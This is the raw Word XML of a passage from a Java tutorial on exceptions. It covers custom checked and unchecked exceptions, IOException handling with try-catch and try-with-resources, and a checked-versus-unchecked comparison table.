        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B75866A"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76B272E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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36EE5B4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ndle/Declare Required?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="712FE949"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Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4E28" w:rsidRPr="00CE4B95" w14:paraId="448BC216" w14:textId="77777777" w:rsidTr="006C0087">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1406D89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rror</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65AF507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11AF20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677FF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StackOverflowError</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4E28" w:rsidRPr="00CE4B95" w14:paraId="3AB72E12" w14:textId="77777777" w:rsidTr="006C0087">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40A1AE2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15A287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72F4D3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CB2997E"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4E28" w:rsidRPr="00CE4B95" w14:paraId="1FD4667C" w14:textId="77777777" w:rsidTr="006C0087">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="206F44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Exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="679D118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FB709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BE874C3"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50DE5D04" w14:textId="3E8C74BC"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0403D" w14:textId="1CED0F1F" w:rsidR="00E54BB5" w:rsidRPr="00CE4B95" w:rsidRDefault="00E54BB5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="_Toc197867426"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to create </w:t>
      </w:r>
      <w:r w:rsidR="00865D33"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ustom </w:t>
      </w:r>
      <w:r w:rsidR="00865D33" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>xceptions?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
    </w:p>
    <w:p w14:paraId="600D973B" w14:textId="43407EB4" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">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Creating a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is simple and useful when you want to throw application-specific exceptions with meaningful names and messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046F8CF3"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2848013C">
          <v:rect id="_x0000_i1605" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F09F0"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eps to Create a Custom Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD16DB"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Extend the appropriate base class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15527AC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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extend Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D902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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extend RuntimeException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD093F9"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6D642BCB">
          <v:rect id="_x0000_i1606" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C95C7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1: Custom Checked Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED5D7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Checked Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702720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InvalidAgeException extends Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281B932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AgeException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E866AD"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22B7E73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42D35A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70A60E" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9F451F"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 in code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B8E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1C07A9D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Age(int age) throws InvalidAgeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B33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age &lt; 18) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C6C7D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AgeException("Age must be 18 or above.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EDBF41"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38CED7E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age");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723DE16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AFE265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3125265" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40EF9E4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439886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D6DB65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Age(16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FA1F6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 (InvalidAgeException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9256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xception caught: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B10482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AACD89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3FDB2D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76C35685"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36F0F226">
          <v:rect id="_x0000_i1607" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB19C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2: Custom Unchecked Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76791C6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Unchecked Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4329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lastRenderedPageBreak/>
        <w:t>public class InvalidNameException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9C196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NameException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758728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5D1F590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A7CD58"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3E7D7459" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE549D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E3F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24E70A8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Name(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B047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name == null || name.isEmpty()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4637A1B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NameException("Name cannot be empty.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4320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2D486B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name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4671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7F81F3F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7A548E" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0A9A0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0C42BE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Name(""); // Will throw exception at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D6093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E2CBF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C12B61"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548668C1">
          <v:rect id="_x0000_i1608" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA0D8A"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Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD65727"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checked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exceptions when the caller is expected to handle it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DA3BED"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unchecked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exceptions for programming errors or illegal states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7039B4E2" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="921"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always provide a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>meaningful message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE38510" w14:textId="76874719" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="1C795A3B">
          <v:rect id="_x0000_i1609" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668F3AB" w14:textId="77777777" w:rsidR="003E6A16" w:rsidRPr="00CE4B95" w:rsidRDefault="003E6A16">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="_Toc197867427"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to handle IOException?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w14:paraId="294D8471" w14:textId="17A021B9" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E50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thrown when there is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>failure in input/output operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE99C0"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a file that doesn't exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD2526"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to a read-only file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1647312C"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work issues during IO operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44361CF5"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245DA">
          <v:rect id="_x0000_i1610" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B01B0C7" w14:textId="7C761B55"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00DA2C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ays to Handle IOException:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE7B0F6"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E8CF9">
          <v:rect id="_x0000_i1611" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CB225"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7BCB1B0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9D95A86" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6272A55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633CD7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2C3F4E"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C85532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11D4B5E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2852F62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1B9CF1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04B9E6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08632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2CCFCC0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3AD3A0C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caught: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CBE9E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D832A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1D24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0128C2"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2D897">
          <v:rect id="_x0000_i1612" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2585A1F3"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throws clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A2AA57"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056D94E4" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F594A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FileReaderExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355338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76A74A0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0ACF523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E922C4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58BA4669"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7D2C0C1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D81E4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070D661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11C5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5A31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this when you want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exception handling to the caller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550D8F9A"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7BF22C">
          <v:rect id="_x0000_i1613" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="044AEB47"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4930BE96" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ways </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>close resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FileReader, BufferedReader, etc.) in a finally block or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Java 7+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C5861"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6493E">
          <v:rect id="_x0000_i1614" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA783E9"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y-with-resources example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C7975"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D4C41FD" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318C618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7185362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7A668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FileReader reader = new FileReader("file.txt")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC417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927D50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8238D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7004CB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CF5C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27BCDA1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handled: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13064F5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1E609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BA21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DAAC39" w14:textId="4D04BCC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15" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="018CE95D" w14:textId="5930F21A" w:rsidR="002D6AFA" w:rsidRPr="00CE4B95" w:rsidRDefault="009A06ED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_Toc197867428"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="002D6AFA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifference between </w:t>
      </w:r>
      <w:r w:rsidR="00E3690F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="002D6AFA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">xception and </w:t>
      </w:r>
      <w:r w:rsidR="00E3690F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="002D6AFA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc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xception?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p w14:paraId="7E768782" w14:textId="56A1F9BA" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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quick comparison between </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Checked Excep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checked Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243986A8"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0EF50">
          <v:rect id="_x0000_i1616" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEF9B6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3121"/>
        <w:gridCol w:w="4968"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="5891882B" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C294CA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76E902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479C771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checked Exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="01F3BC52" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6221B92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ckage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C8FDB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Exception (excluding RuntimeException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33BA023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RuntimeException and its subclasses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="3A31FE69" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
